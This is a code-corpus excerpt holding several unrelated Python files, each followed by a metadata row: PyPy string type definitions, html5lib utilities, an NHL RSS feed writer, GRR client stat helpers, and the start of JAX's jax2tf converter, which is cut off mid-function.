' must be a string of length 256.')
str_decode = SMM('decode', 3, defaults=(None, None),
doc='S.decode([encoding[,errors]]) -> object\n\nDecodes S'
' using the codec registered for encoding. encoding'
' defaults\nto the default encoding. errors may be'
' given to set a different error\nhandling scheme.'
" Default is 'strict' meaning that encoding errors"
' raise\na UnicodeDecodeError. Other possible values'
" are 'ignore' and 'replace'\nas well as any other"
' name registerd with codecs.register_error that'
' is\nable to handle UnicodeDecodeErrors.')
str_encode = SMM('encode', 3, defaults=(None, None),
doc='S.encode([encoding[,errors]]) -> object\n\nEncodes S'
' using the codec registered for encoding. encoding'
' defaults\nto the default encoding. errors may be'
' given to set a different error\nhandling scheme.'
" Default is 'strict' meaning that encoding errors"
' raise\na UnicodeEncodeError. Other possible values'
" are 'ignore', 'replace' and\n'xmlcharrefreplace' as"
' well as any other name registered'
' with\ncodecs.register_error that is able to handle'
' UnicodeEncodeErrors.')
# ____________________________________________________________
def descr__new__(space, w_stringtype, w_object=''):
# NB. the default value of w_object is really a *wrapped* empty string:
# there is gateway magic at work
from pypy.objspace.std.stringobject import W_StringObject
w_obj = space.str(w_object)
if space.is_w(w_stringtype, space.w_str):
return w_obj # XXX might be reworked when space.str() typechecks
value = space.str_w(w_obj)
if space.config.objspace.std.withrope:
from pypy.objspace.std.ropeobject import rope, W_RopeObject
w_obj = space.allocate_instance(W_RopeObject, w_stringtype)
W_RopeObject.__init__(w_obj, rope.LiteralStringNode(value))
return w_obj
else:
w_obj = space.allocate_instance(W_StringObject, w_stringtype)
W_StringObject.__init__(w_obj, value)
return w_obj
# ____________________________________________________________
str_typedef = StdTypeDef("str", basestring_typedef,
__new__ = newmethod(descr__new__),
__doc__ = '''str(object) -> string
Return a nice string representation of the object.
If the argument is a string, the return value is the same object.'''
)
str_typedef.custom_hash = True
str_typedef.registermethods(globals())
# ____________________________________________________________
# Helpers for several string implementations
@specialize.argtype(0)
def stringendswith(u_self, suffix, start, end):
begin = end - len(suffix)
if begin < start:
return False
for i in range(len(suffix)):
if u_self[begin+i] != suffix[i]:
return False
return True
@specialize.argtype(0)
def stringstartswith(u_self, prefix, start, end):
stop = start + len(prefix)
if stop > end:
return False
for i in range(len(prefix)):
if u_self[start+i] != prefix[i]:
return False
return True
| pypy/objspace/std/stringtype.py | 18,300 | share characters and empty string annotator hint: a single char only share the empty string XXX heuristic, should be improved!unicode mimic not supported now ____________________________________________________________ NB. the default value of w_object is really a *wrapped* empty string: there is gateway magic at work XXX might be reworked when space.str() typechecks ____________________________________________________________ ____________________________________________________________ Helpers for several string implementations | 538 | en | 0.566113 |
from __future__ import absolute_import
from types import ModuleType
class MethodDispatcher(dict):
u"""Dict with 2 special properties:
On initiation, keys that are lists, sets or tuples are converted to
multiple keys so accessing any one of the items in the original
list-like object returns the matching value
md = MethodDispatcher({("foo", "bar"):"baz"})
md["foo"] == "baz"
A default value which can be set through the default attribute.
"""
def __init__(self, items=()):
# Using _dictEntries instead of directly assigning to self is about
# twice as fast. Please do careful performance testing before changing
# anything here.
_dictEntries = []
for name,value in items:
if type(name) in (list, tuple, frozenset, set):
for item in name:
_dictEntries.append((item, value))
else:
_dictEntries.append((name, value))
dict.__init__(self, _dictEntries)
self.default = None
__init__.func_annotations = {}
def __getitem__(self, key):
return dict.get(self, key, self.default)
__getitem__.func_annotations = {}
#Some utility functions to dal with weirdness around UCS2 vs UCS4
#python builds
def encodingType():
if len() == 2:
return u"UCS2"
else:
return u"UCS4"
encodingType.func_annotations = {}
def isSurrogatePair(data):
return (len(data) == 2 and
ord(data[0]) >= 0xD800 and ord(data[0]) <= 0xDBFF and
ord(data[1]) >= 0xDC00 and ord(data[1]) <= 0xDFFF)
isSurrogatePair.func_annotations = {}
def surrogatePairToCodepoint(data):
char_val = (0x10000 + (ord(data[0]) - 0xD800) * 0x400 +
(ord(data[1]) - 0xDC00))
return char_val
surrogatePairToCodepoint.func_annotations = {}
# Module Factory Factory (no, this isn't Java, I know)
# Here to stop this being duplicated all over the place.
def moduleFactoryFactory(factory):
moduleCache = {}
def moduleFactory(baseModule, *args, **kwargs):
if type(ModuleType.__name__) is unicode:
name = u"_%s_factory" % baseModule.__name__
else:
name = "_%s_factory" % baseModule.__name__
if name in moduleCache:
return moduleCache[name]
else:
mod = ModuleType(name)
objs = factory(baseModule, *args, **kwargs)
mod.__dict__.update(objs)
moduleCache[name] = mod
return mod
moduleFactory.func_annotations = {}
return moduleFactory
moduleFactoryFactory.func_annotations = {}
| python/html5lib/utils.py | 2,627 | Dict with 2 special properties:
On initiation, keys that are lists, sets or tuples are converted to
multiple keys so accessing any one of the items in the original
list-like object returns the matching value
md = MethodDispatcher({("foo", "bar"):"baz"})
md["foo"] == "baz"
A default value which can be set through the default attribute.
Using _dictEntries instead of directly assigning to self is about twice as fast. Please do careful performance testing before changing anything here.Some utility functions to dal with weirdness around UCS2 vs UCS4python builds Module Factory Factory (no, this isn't Java, I know) Here to stop this being duplicated all over the place. | 676 | en | 0.842082 |
import os
__author__ = "Aaron Koeppel"
__version__ = 1.0
def xmlMarkup(games, team_ab, team_name, team_record):
'''Markup the RSS feed using the data obtained.
:param games: list of games that the team played this season
:type games: list of GameData
:param team_ab: the team's abbreviated name
:type team_ab: string
:param team_name: the team's name
:type team_name: string'''
file_name = team_ab + "_feed.xml"
'''Used code from http://stackoverflow.com/questions/7935972/
writing-to-a-new-directory-in-python-without-changing-directory'''
script_dir = os.path.dirname(os.path.abspath(__file__))
dest_dir = os.path.join(script_dir, "feeds", team_ab)
try:
os.makedirs(dest_dir)
except OSError:
pass
path = os.path.join(dest_dir, file_name)
with open(path, 'w') as xml:
xml.write('<?xml version="1.0" encoding="UTF-8" ?>\n')
xml.write("<rss version='2.0'>\n")
xml.write("<channel>\n")
xml.write("<title>%s - %s</title>\n" % (team_name, team_record))
xml.write("<description>Latest %s scores</description>\n" % team_name)
xml.write("<link>http://espn.go.com/nhl/team/schedule/_/name/%s</link>\n"
% team_ab)
for game in games:
xml.write("<item>\n")
xml.write("<title>%s</title>\n" % game.headline)
xml.write("<link>%s</link>\n" % game.link)
xml.write("</item>\n")
xml.write("</channel>\n</rss>")
xml.close() | markup.py | 1,496 | Markup the RSS feed using the data obtained.
:param games: list of games that the team played this season
:type games: list of GameData
:param team_ab: the team's abbreviated name
:type team_ab: string
:param team_name: the team's name
:type team_name: string | 260 | en | 0.898845 |
#!/usr/bin/env python
"""Client utilities."""
import logging
import sys
from grr_response_core.lib import utils
from grr_response_core.lib.rdfvalues import client_fs as rdf_client_fs
from grr_response_core.lib.rdfvalues import paths as rdf_paths
# pylint: disable=g-import-not-at-top
if sys.platform == "win32":
from grr_response_client import client_utils_windows as _client_utils
elif sys.platform == "darwin":
from grr_response_client import client_utils_osx as _client_utils
else:
from grr_response_client import client_utils_linux as _client_utils
# pylint: enable=g-import-not-at-top
# pylint: disable=g-bad-name
CanonicalPathToLocalPath = _client_utils.CanonicalPathToLocalPath
FindProxies = _client_utils.FindProxies
GetExtAttrs = _client_utils.GetExtAttrs
GetRawDevice = _client_utils.GetRawDevice
KeepAlive = _client_utils.KeepAlive
LocalPathToCanonicalPath = _client_utils.LocalPathToCanonicalPath
MemoryRegions = _client_utils.MemoryRegions
NannyController = _client_utils.NannyController
OpenProcessForMemoryAccess = _client_utils.OpenProcessForMemoryAccess
TransactionLog = _client_utils.TransactionLog
VerifyFileOwner = _client_utils.VerifyFileOwner
# pylint: enable=g-bad-name
def StatEntryFromPath(path, pathspec, ext_attrs=True):
"""Builds a stat entry object from a given path.
Args:
path: A path (string value) to stat.
pathspec: A `PathSpec` corresponding to the `path`.
ext_attrs: Whether to include extended file attributes in the result.
Returns:
`StatEntry` object.
"""
try:
stat = utils.Stat(path)
except (IOError, OSError) as error:
logging.error("Failed to obtain stat for '%s': %s", pathspec, error)
return rdf_client_fs.StatEntry(pathspec=pathspec)
return StatEntryFromStat(stat, pathspec, ext_attrs=ext_attrs)
def StatEntryFromStat(stat, pathspec, ext_attrs=True):
"""Build a stat entry object from a given stat object.
Args:
stat: A `Stat` object.
pathspec: A `PathSpec` from which `stat` was obtained.
ext_attrs: Whether to include extended file attributes in the result.
Returns:
`StatEntry` object.
"""
result = rdf_client_fs.StatEntry(pathspec=pathspec)
for attr in _STAT_ATTRS:
value = getattr(stat.GetRaw(), attr, None)
if value is None:
continue
# TODO(hanuszczak): Why are we doing this?
value = int(value)
if value < 0:
value &= 0xFFFFFFFF
setattr(result, attr, value)
result.st_flags_linux = stat.GetLinuxFlags()
result.st_flags_osx = stat.GetOsxFlags()
if ext_attrs:
# TODO(hanuszczak): Can we somehow incorporate extended attribute getter to
# the `Stat` class? That would make the code a lot prettier but would force
# `utils` to depend on `xattrs`.
result.ext_attrs = list(GetExtAttrs(stat.GetPath()))
return result
def StatEntryFromStatPathSpec(stat, ext_attrs):
pathspec = rdf_paths.PathSpec(
pathtype=rdf_paths.PathSpec.PathType.OS,
path=LocalPathToCanonicalPath(stat.GetPath()),
path_options=rdf_paths.PathSpec.Options.CASE_LITERAL)
return StatEntryFromStat(stat, pathspec, ext_attrs=ext_attrs)
_STAT_ATTRS = [
"st_mode",
"st_ino",
"st_dev",
"st_nlink",
"st_uid",
"st_gid",
"st_size",
"st_atime",
"st_mtime",
"st_ctime",
"st_blocks",
"st_blksize",
"st_rdev",
]
| grr/client/grr_response_client/client_utils.py | 3,344 | Builds a stat entry object from a given path.
Args:
path: A path (string value) to stat.
pathspec: A `PathSpec` corresponding to the `path`.
ext_attrs: Whether to include extended file attributes in the result.
Returns:
`StatEntry` object.
Build a stat entry object from a given stat object.
Args:
stat: A `Stat` object.
pathspec: A `PathSpec` from which `stat` was obtained.
ext_attrs: Whether to include extended file attributes in the result.
Returns:
`StatEntry` object.
Client utilities.
!/usr/bin/env python pylint: disable=g-import-not-at-top pylint: enable=g-import-not-at-top pylint: disable=g-bad-name pylint: enable=g-bad-name TODO(hanuszczak): Why are we doing this? TODO(hanuszczak): Can we somehow incorporate extended attribute getter to the `Stat` class? That would make the code a lot prettier but would force `utils` to depend on `xattrs`. | 878 | en | 0.772844 |
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Experimental module transforms JAX functions to be executed by TensorFlow."""
import functools
import re
import string
from typing import Any, Callable, Dict, Iterable, List, Optional, Sequence, Tuple, Union
import jax
from jax import ad_util, api_util, config
from jax._src import api
from jax import core, custom_derivatives, dtypes
from jax import linear_util as lu
from jax import numpy as jnp
from jax import random, tree_util
from jax._src import util
from jax._src.lax import control_flow as lax_control_flow
from jax._src.lax import fft as lax_fft
from jax._src.lax import lax
from jax._src.lax import linalg as lax_linalg
import jax._src.random
from jax.api_util import flatten_fun
from jax.interpreters import ad
from jax.interpreters import pxla
from jax.interpreters import sharded_jit
from jax.interpreters import xla
from jax.lib import xla_client
from . import shape_poly
import numpy as np
import tensorflow as tf # type: ignore[import]
# These don't have public equivalents.
# pylint: disable=g-direct-tensorflow-import
from tensorflow.compiler.tf2xla.python import xla as tfxla # type: ignore[import]
from tensorflow.compiler.xla import xla_data_pb2 # type: ignore[import]
from tensorflow.compiler.xla.experimental.xla_sharding import xla_sharding # type: ignore[import]
# pylint: enable=g-direct-tensorflow-import
PolyShape = shape_poly.PolyShape
# The scope name need to be a valid TensorFlow name. See
# https://github.com/tensorflow/tensorflow/blob/r2.3/tensorflow/core/framework/node_def_util.cc#L731
_VALID_SCOPE_REGEX = re.compile("^[A-Za-z0-9.][A-Za-z0-9_.\\/>-]*$")
_INVALID_SCOPE_CHAR = re.compile("[^A-Za-z0-9_.\\/>-]")
def _sanitize_scope_name(name):
scope_name = _INVALID_SCOPE_CHAR.sub("_", name)
if not _VALID_SCOPE_REGEX.match(scope_name):
scope_name = ".{}".format(scope_name)
return scope_name
# A value suitable in a TF tracing context: tf.Tensor, tf.Variable,
# or Python scalar or numpy.ndarray. (A tf.EagerTensor is a tf.Tensor.)
TfVal = Any
DType = Any
PrecisionType = int # Enum xla_data.PrecisionConfig.Precision
def _is_tfval(v: TfVal) -> bool:
if isinstance(v, (tf.Tensor, tf.Variable)):
return True
try:
# Note: this conversion is overkill and just intended as a type check; this
# code is in principle only run if config.jax_enable_checks is True.
# TODO: it is not true that this code is run only with jax_enable_checks.
_safe_convert_to_tensor(v)
return True
except ValueError:
return False
def _safe_convert_to_tensor(val, dtype=None) -> TfVal:
dtype = dtype if dtype else (val.dtype if hasattr(val, "dtype") else None)
conversion_type = to_tf_dtype(dtype) if dtype else None
# The float0 type is not known to TF.
if dtype and dtype == dtypes.float0:
val = np.zeros(np.shape(val), conversion_type.as_numpy_dtype)
return tf.convert_to_tensor(val, dtype=conversion_type)
# The implementation rules for primitives. The rule will be called with the
# arguments (TfVal) and must return TfVal (or a sequence thereof,
# if primitive.multiple_results). The vast majority of primitives do not need
# to worry about core.unit inputs or results. The exception are primarily the
# control-flow primitives.
tf_impl: Dict[core.Primitive, Callable[..., Any]] = {}
# Some primitive implementation rules need the abstract values of arguments
# and the results. This is the case for the primitives implemented using
# _convert_jax_impl and those that need to adjust the shape of the outputs
# due to missing TF shape inference rules for TFXLA ops. The rules for these
# primitives should be added to `tf_impl_with_avals`.
# The abstract value are passed to the implementation as two special kwargs
# `_in_avals` (a tuple of core.AbstractValue) and `_out_aval` (a
# core.AbstractValue, or a tuple thereof when primitive.multiple_results).
tf_impl_with_avals: Dict[core.Primitive, Callable[..., Any]] = {}
# XLA is not linked in all environments; when converting a primitive, if this
# variable is disabled, we try harder to use only standard TF ops if they are
# applicable to the concrete use case; if the resulting conversion path ends up
# requiring a TFXLA operation, an exception is thrown instead.
_enable_xla = True
def _xla_disabled_error(primitive_name: str,
extra_msg: Optional[str] = None) -> Exception:
assert not _enable_xla
msg = f"Call to {primitive_name} cannot be converted with enable_xla=False."
if extra_msg:
msg += f" {extra_msg}"
return NotImplementedError(msg)
@functools.partial(api_util.api_hook, tag="jax2tf_convert")
def convert(fun: Callable,
*,
polymorphic_shapes: Optional[Sequence[Any]] = None,
with_gradient=True,
enable_xla=True) -> Callable:
"""Transforms `fun` to be executed by TensorFlow.
See
[README](https://github.com/google/jax/blob/master/jax/experimental/jax2tf/README.md)
for more details about usage and common problems.
Args:
fun: Function to be transformed. Its arguments and return value should be
JAX arrays, or nested standard Python containers (tuple/list/dict) thereof
(pytrees).
polymorphic_shapes: Specifies input shapes to be treated polymorphically
during conversion.
.. warning:: The shape-polymorphic conversion is an experimental feature.
It is meant to be sound, but it is known to reject some JAX programs
that are shape polymorphic. The details of this feature can change. It
should be a Python object with the same pytree structure as, or a prefix
of, the tuple of arguments to the function, but with a shape
specification corresponding to each argument. The default value is
`None`, which is a shortcut for a tuple of `None` one for each argument,
denoting that all shapes are monomorphic.
See [how optional parameters are matched to
arguments](https://jax.readthedocs.io/en/latest/pytrees.html#applying-optional-parameters-to-pytrees).
A shape specification for an array argument should be an object
`PolyShape(dim0, dim1, ..., dimn)`
where each `dim` is a dimension specification: a positive integer denoting
a monomorphic dimension of the given size, or a string denoting a
dimension variable assumed to range over non-zero dimension sizes, or
the special placeholder string "_" denoting a monomorphic dimension
whose size is given by the actual argument. As a shortcut, an Ellipsis
suffix in the list of dimension specifications stands for a list of "_"
placeholders. For convenience, a shape specification can also be given
as a string
representation, e.g.: "batch, ...", "batch, height, width, _", possibly
with surrounding parentheses: "(batch, ...)".
The conversion fails if it cannot ensure that the it would produce the same
sequence of TF ops for any non-zero values of the dimension variables.
polymorphic_shapes are only supported for positional arguments; shape
polymorphism is not supported for keyword arguments.
See [the README](https://github.com/google/jax/blob/master/jax/experimental/jax2tf/README.md#shape-polymorphic-conversion)
for more details.
in_shapes: DEPRECATED in favor of `polymorphic_shapes`.
with_gradient: if set, will add a tf.custom_gradient to the converted
function, by converting the ``jax.vjp(fun)``. Only first-order
differentiation is supported for now. If the converted function is saved
in a SavedModel, the custom gradients are currently lost and an error will
be raised if a gradient computation is attempted. This is due to a current
bug in TensorFlow.
enable_xla: if unset, the converter will try harder to use pure TF ops to
convert the function, and raise an error if it can not be converted
without resorting to XLA ops (default: True).
Returns:
A version of `fun` that expects TfVals as arguments (or
tuple/lists/dicts) thereof, and returns TfVals as outputs.
"""
api._check_callable(fun)
def converted_fun(*args: TfVal, **kwargs: TfVal) -> TfVal:
# TODO: is there a better way to check if we are inside a transformation?
if not core.trace_state_clean():
raise ValueError("convert must be used outside all JAX transformations." +
f"Trace state: {core.thread_local_state.trace_state}")
def check_arg(a):
if not _is_tfval(a):
msg = (f"Argument {a} of type {type(a)} of jax2tf.convert(f) should "
"be NumPy array, scalar, tf.Variable, or tf.Tensor")
raise TypeError(msg)
tree_util.tree_map(check_arg, args)
tree_util.tree_map(check_arg, list(kwargs.values()))
# Name input tensors
args = tuple(
tree_util.tree_map(lambda x, i=i: tf.identity(x, f"jax2tf_arg_{i}"),
a) # type: ignore
for i, a in enumerate(args))
kwargs = {k: tf.identity(v, f"jax2tf_arg_{k}") for k, v in kwargs.items()}
# This function may take pytrees of TfVals. We can only set
# tf.custom_gradient on functions that take a flat argument list.
args_flat, in_tree = tree_util.tree_flatten((args, kwargs))
if polymorphic_shapes is None:
polymorphic_shapes_ = (None,) * len(args)
else:
if not isinstance(polymorphic_shapes, Sequence) or len(args) != len(polymorphic_shapes):
msg = ("polymorphic_shapes must be a sequence with the same length as the positional argument list "
f"({len(args)}). Got polymorphic_shapes={polymorphic_shapes}.")
raise TypeError(msg)
polymorphic_shapes_ = tuple(polymorphic_shapes)
# Expand the polymorphic_shapes to match the argument pytree
polymorphic_shapes_flat = tuple(api_util.flatten_axes("jax2tf.convert polymorphic_shapes",
in_tree.children()[0],
polymorphic_shapes_))
# Add kwargs shapes.
polymorphic_shapes_flat = polymorphic_shapes_flat + tuple(
(None,) * (len(args_flat) - len(polymorphic_shapes_flat)))
# Construct the abstract values for the flat arguments, possibly based on
# the input shapes and the polymorphic_shapes if given. May create new shape
# variables.
args_avals_flat, shapeenv = _args_to_avals_and_env(args_flat,
polymorphic_shapes_flat)
f = lu.wrap_init(fun)
# out_tree_thunk() will be the output tree, after running _interpret_fun.
flat_fun, out_tree_thunk = flatten_fun(f, in_tree)
# Prepare the grad_fn for tf.custom_gradient.
def converted_grad_fn(*out_cts_flat: TfVal,
_out_cts_avals: Sequence[core.AbstractValue],
variables=None):
if variables:
raise ValueError(
"Unexpected variables used in forward pass. "
"This should not happen for first-order differentiation. "
f"variables={variables}")
def fun_vjp_jax(args_jax, out_cts_jax):
# One may think that we can get the pullback while we are converting
# the main function in the first place. That is problematic, because the
# pullback may contain captured tracers from the conversion of the
# main function. Those tracers will confuse the conversion of the
# pullback. So, we construct the vjp anew.
_, pullback_jax = jax.vjp(fun, *args_jax)
return pullback_jax(out_cts_jax)
if polymorphic_shapes is None:
vjp_polymorphic_shapes = None
else:
args_polymorphic_shapes = tree_util.tree_unflatten(
in_tree.children()[0], polymorphic_shapes_flat)
out_cts_polymorphic_shapes = tree_util.tree_unflatten(
out_tree_thunk(),
tuple(str(out_aval.shape)
for out_aval in _out_cts_avals)) # type: ignore
vjp_polymorphic_shapes = [
args_polymorphic_shapes, out_cts_polymorphic_shapes
]
out_cts = tree_util.tree_unflatten(out_tree_thunk(), out_cts_flat)
# TODO: enable higher-order gradients
with tf.name_scope("jax2tf_vjp"):
in_cts = convert(
fun_vjp_jax,
with_gradient=False,
polymorphic_shapes=vjp_polymorphic_shapes)(args, out_cts)
return in_cts
try:
global _shape_env
assert not _shape_env, f"Unexpected shape environment {_shape_env}"
global _enable_xla
prev_enable_xla = _enable_xla
_enable_xla = enable_xla
_shape_env = shapeenv
if with_gradient:
@tf.custom_gradient
def converted_fun_flat_with_custom_gradient(*args_flat: TfVal) -> TfVal:
out_with_avals = _interpret_fun(flat_fun, args_flat, args_avals_flat)
outs, out_avals = util.unzip2(out_with_avals)
return (tuple(outs),
functools.partial(
converted_grad_fn, _out_cts_avals=tuple(out_avals)))
out_flat = converted_fun_flat_with_custom_gradient(*args_flat)
else:
out_flat_raw = _interpret_fun(flat_fun, args_flat, args_avals_flat)
message = ("The jax2tf-converted function does not support gradients. "
"Use `with_gradient` parameter to enable gradients")
# We use PreventGradient, which is propagated through a SavedModel.
out_flat = [
tf.raw_ops.PreventGradient(input=o, message=message)
for o, _ in out_flat_raw
]
finally:
_shape_env = {}
_enable_xla = prev_enable_xla
out_flat = [tf.identity(x, "jax2tf_out") for x in out_flat]
out = tree_util.tree_unflatten(out_tree_thunk(), out_flat)
return out
return converted_fun
# Internals
def _interpret_fun(
fun: lu.WrappedFun, in_vals: Sequence[TfVal],
in_avals: Sequence[core.AbstractValue]
) -> Sequence[Tuple[TfVal, core.AbstractValue]]:
with core.new_base_main(TensorFlowTrace) as main: # type: ignore
fun = _interpret_subtrace(fun, main, in_avals)
with core.new_sublevel():
out_vals: Sequence[Tuple[TfVal, core.AbstractValue]] = \
fun.call_wrapped(*in_vals)
del main
return tuple(out_vals)
def _convert_jax_impl(jax_impl: Callable, *, multiple_results=True) -> Callable:
"""Convert the JAX implementation of a primitive.
Args:
jax_impl: typically the impl-rule for a primitive, with signature
`(*args: JaxVal, **kwargs) -> Sequence[JaxVal]`. This function implements
a primitive in terms of other primitives.
multiple_results: whether `jax_impl` returns a sequence of results.
Returns:
a function with signature `(*args: TfVal, _in_avals, _out_aval, **kwargs)
-> Sequence[TfVal]`.
"""
def wrapped(*tf_args: TfVal, _in_avals: Sequence[core.AbstractValue],
_out_aval: core.AbstractValue, **kwargs) -> Sequence[TfVal]:
# We wrap the jax_impl under _interpret_fun to abstract the TF values
# from jax_impl and turn them into JAX abstract values.
def jax_impl_jax_args(*jax_args):
jax_results = jax_impl(*jax_args, **kwargs)
return jax_results if multiple_results else [jax_results]
tf_results_with_avals = _interpret_fun(
lu.wrap_init(jax_impl_jax_args), tf_args, _in_avals)
tf_results, _ = util.unzip2(tf_results_with_avals)
return tf_results if multiple_results else tf_results[0]
return wrapped
@lu.transformation
def _interpret_subtrace(main: core.MainTrace,
in_avals: Sequence[core.AbstractValue],
*in_vals: TfVal):
trace = TensorFlowTrace(main, core.cur_sublevel())
in_tracers = tuple(
TensorFlowTracer(trace, val, aval)
for val, aval in util.safe_zip(in_vals, in_avals))
# The outs may be core.unit, see comment in TensorFlowTrace.pure.
outs = yield in_tracers, {} # type: Sequence[Union[TfVal, core.Unit]]
out_tracers: Iterable[TensorFlowTracer] = (
map(trace.full_raise, outs)) # type: ignore
out_vals_with_avals: Sequence[Tuple[TfVal, core.AbstractValue]] = (
tuple((t.val, t.aval) for t in out_tracers))
yield out_vals_with_avals
def _interpret_jaxpr(jaxpr: core.ClosedJaxpr, *args: TfVal) -> Sequence[TfVal]:
"""Evaluates a Jaxpr with tf.Tensor arguments.
The output is a sequence of TfVal (no `core.unit`), suitable for use with TF.
"""
fun: lu.WrappedFun = lu.wrap_init(core.jaxpr_as_fun(jaxpr))
out_with_avals = _interpret_fun(fun, args, jaxpr.in_avals)
return tuple(v for v, _ in out_with_avals)
### tracer
def _aval_to_tf_shape(aval: core.AbstractValue) -> Tuple[Optional[int], ...]:
"""Generate a TF shape, possibly containing None for polymorphic dimensions."""
return tuple(
map(lambda d: None if isinstance(d, shape_poly.DimVar) else d,
aval.shape)) # type: ignore[attr-defined]
def _tfval_shape_dtype(val: TfVal) -> Tuple[Sequence[Optional[int]], DType]:
"""Called for constants that occur in the program, or for input values to the converted function.
The returned shape may have unknown components, but only when called for
inputs.
"""
if isinstance(val, (tf.Tensor, tf.Variable)):
# May be partially known
return tuple(val.shape), to_jax_dtype(val.dtype)
else: # Must be a numeric value
assert not config.jax_enable_checks or _is_tfval(val), f"Non TfVal: {val}"
raw_aval = xla.abstractify(val)
return raw_aval.shape, raw_aval.dtype # type: ignore[attr-defined]
# A dimension environment maps dimension variables to TF expressions that
# compute the value of the dimension. These expressions refer to the TF
# function arguments.
_ShapeEnv = Dict[shape_poly.DimVar, TfVal]
def _args_to_avals_and_env(args: Sequence[TfVal],
polymorphic_shapes: Sequence[Optional[Union[str, PolyShape]]]) -> \
Tuple[Sequence[core.AbstractValue], _ShapeEnv]:
"""Computes abstract values and a dimension environment for arguments.
Args:
args: the arguments, TF inputs.
polymorphic_shapes: the polymorphic specifications for the arguments.
Returns: a tuple of a sequence of abtract values corresponding to the
arguments and a dimension environment.
"""
shapeenv: _ShapeEnv = {}
def input_aval(arg: TfVal,
polymorphic_shape: Optional[str]) -> core.AbstractValue:
"""The abstract value for an input."""
raw_shape, dtype = _tfval_shape_dtype(arg)
aval_shape = shape_poly.parse_spec(polymorphic_shape, raw_shape)
for i, d in enumerate(aval_shape):
if type(d) is int:
assert d == np.shape(arg)[i]
elif type(d) is shape_poly.DimVar and d not in shapeenv:
# Even if the shape of `arg` is known, we still use `tf.shape` for
# safety, because the promise is that we will convert the function
# to work for any value of the dimension.
shapeenv[d] = tf.shape(arg)[i] # type: ignore[index]
else:
# TODO: add an assertion tf.shape(arg)[i] == env[d]
pass
return core.ShapedArray(aval_shape, dtype)
avals = tuple(map(input_aval, args, polymorphic_shapes)) # type: ignore
return avals, shapeenv
# A shape environment maps shape variables to TfVal.
_shape_env = {} # type: _ShapeEnv
def _eval_shape(shape: Sequence[shape_poly.DimSize]) -> Sequence[TfVal]:
assert all(map(
lambda x: x is not None,
shape)), (f"Argument shape should be a valid JAX shape but got {shape}")
return tuple(_shape_env[d] # type: ignore[index]
if type(d) is shape_poly.DimVar else d
for d in shape)
def shape_as_value(x):
"""Injects the shape of `x` as an array value.
**Experimental: please give feedback, and expect changes!**
This allows the use of a shape expression as array argument to JAX functions.
A typical example is for implementing a mean operation:
jnp.sum(x) / np.prod(jax2tf.shape_as_value(x))
"""
# return shape_as_value_p.bind(x)
return NotImplementedError("shape_as_value is deprecated")
# # TODO: move this to masking or to some common library, if approved
# shape_as_value_p = core.Primitive("shape_as_value")
# shape_as_value_p.multiple_results = True
# def _shape_as_value_impl(x):
# x_shape = np.shape(x)
# def dim_to_int(dim: shape_poly.DimSize) -> int:
# dim_int = _poly_dim_to_tf_dim(dim)
# if dim_int is None:
# msg = ("shape_as_value is not implemented for non-constant shapes "
# "except for masking and jax2tf. "
# f"Has shape: {x_shape}")
# raise TypeError(msg)
# else:
# return dim_int
# return tuple(map(dim_to_int, x_shape))
#
# shape_as_value_p.def_impl(_shape_as_value_impl)
#
# def _shape_as_value_abstract(x_aval: core.AbstractValue) -> Sequence[core.AbstractValue]:
# rank = len(x_aval.shape) # type: ignore[attr-defined]
# return (core.ShapedArray((), dtypes.canonicalize_dtype(np.int_), weak_type=True),) * rank
#
# shape_as_value_p.def_abstract_eval(_shape_as_value_abstract)
#
# def _shape_as_value_translation(comp, x):
# return xla_client._xla.ops.Tuple(comp,
# tuple(xb.constant(comp, d)
# for d in comp.GetShape(x).dimensions()))
#
# xla.translations[shape_as_value_p] = _shape_as_value_translation
#
# def _shape_as_value_jvp_rule(primals, tangents):
# # The shape does not depend on the contents of the input
# x, = primals
# zero = ad.Zero.from_value(0.)
# return shape_as_value(x), (zero,) * len(x.shape)
#
# ad.primitive_jvps[shape_as_value_p] = _shape_as_value_jvp_rule
#
# def _shape_as_value__batching_rule(batched_args, batch_dims):
# xv, = batched_args
# batch_dim, = batch_dims
# batch_size = xv.shape[batch_dim]
# batched_shape = shape_as_value(xv)
# one_shape = batched_shape[0:batch_dim] + batched_shape[batch_dim+1:]
# res = tuple(jnp.broadcast_to(d, (batch_size, 1)) for d in one_shape)
# return res, (0,) * len(one_shape)
#
# batching.primitive_batchers[shape_as_value_p] = _shape_as_value__batching_rule
#
# def _shape_as_value_masking_rule(operands, operands_logical_shapes):
# x_logical_shape, = operands_logical_shapes
# return tuple(x_logical_shape)
#
# masking.masking_rules[shape_as_value_p] = _shape_as_value_masking_rule
#
# def _shape_as_value_tf(x: TfVal,
# _in_avals: Sequence[core.AbstractValue],
# _out_aval: core.AbstractValue) -> TfVal:
# x_aval = _in_avals[0]
# def dim_to_tfval(dim: shape_poly.DimSize, dim_idx: int) -> TfVal:
# dim_int = _poly_dim_to_tf_dim(dim)
# if dim_int is not None:
# return tf.convert_to_tensor(dim_int)
# else:
# return tf.shape(x)[dim_idx]
# return tuple(dim_to_tfval(dim, dim_idx)
# for dim_idx, dim in enumerate(x_aval.shape)) # type: ignore[attr-defined]
#
# tf_impl_with_avals[shape_as_value_p] = _shape_as_value_tf
# TODO(b/26854495): pylint doesn't understand slots and inheritance.
# pylint: disable=assigning-non-slot
class TensorFlowTracer(core.Tracer):
"""Tracer class that boxes a TF value and a JAX abstract value.
In addition to the TF value we carry the JAX abstract value because there are
two cases when it cannot be recovered from the value: (a) when the abstract
value is core.abstract_unit, in which case the value is tf.nan; (b) when we
are converting with polymorphic shapes, in which case the shape of the value
may have dimensions set to `None`, which the JAX abstract value may contain
more precise information.
When the value has a partially-known shape, the dimensions marked as `None`
must correspond to non-constant dimensions in the abstract value.
See README.md for details.
"""
# val: TfVal
# _aval: core.AbstractValue
__slots__ = ["val", "_aval"]
def __init__(self, trace: "TensorFlowTrace", val: TfVal,
aval: core.AbstractValue):
self._trace = trace
self._aval = aval
if aval is core.abstract_unit:
self.val = val
elif isinstance(val, (tf.Tensor, tf.Variable)):
val_shape, val_dtype = _tfval_shape_dtype(val)
aval_dtype = np.dtype(self._aval.dtype) # type: ignore[attr-defined]
if (val_dtype != aval_dtype and not config.x64_enabled and
